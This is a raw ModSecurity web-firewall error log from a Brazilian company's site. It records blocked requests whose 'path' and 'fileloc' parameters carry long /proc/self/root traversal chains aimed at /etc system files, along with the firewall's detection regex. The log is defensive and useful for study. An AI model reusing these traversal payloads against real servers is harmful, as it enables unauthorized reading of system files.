[Mon Mar 16 11:05:29.615942 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.241.46:55500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOKY6lpbStxTqkSktjzgAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:06:04.893195 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.228.16:32780] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgOTLABkC4fWIHEf8HiUAAAAEc"]
[Mon Mar 16 11:06:53.556877 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:58418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOfXbQATo66fKoS7xE0gAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:07:04.879434 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.241.46:33850] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOiBXjF1vJNtV6CWrudwAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:07:08.321659 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.241.46:32788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOjHjZBu2q05ozVU9L5gAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:07:12.900113 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:44522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOkP9ocpUE4ed4uDzkfAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:07:34.415598 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.241.46:44532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOpglT9VtDQc7bgUykQgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:07:40.952076 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:49220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOrJqj1wV0Si-OkefhZwAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:07:42.344292 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:60218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOrnbQATo66fKoS7xE3AAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:08:10.742988 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:45950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOyo6lpbStxTqkSktkNwAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:32.972984 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.244.31:45700] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgO4HjZBu2q05ozVU9MKwAAAUo"]
[Mon Mar 16 11:08:50.721917 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:60222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO8o6lpbStxTqkSktkYQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:52.023572 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:43538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO9Jqj1wV0Si-OkefhagAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:53.301418 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:43546] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO9RXjF1vJNtV6CWruiwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:54.435834 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:43552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO9njZBu2q05ozVU9MRQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:55.722806 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:43560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO93bQATo66fKoS7xFEAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:56.863708 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:43566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO-AlT9VtDQc7bgUykSgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:08:59.122993 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:43574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO-nbQATo66fKoS7xFEwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:00.168950 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.241.46:39082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO_HbQATo66fKoS7xFFQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:00.470721 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:53380] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO_AlT9VtDQc7bgUykTQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:01.799108 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:53384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO_XbQATo66fKoS7xFFwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:03.092894 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:53394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgO__9ocpUE4ed4uDzkkwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:04.427380 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:53396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPANSswJuvopo3lOhWvQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
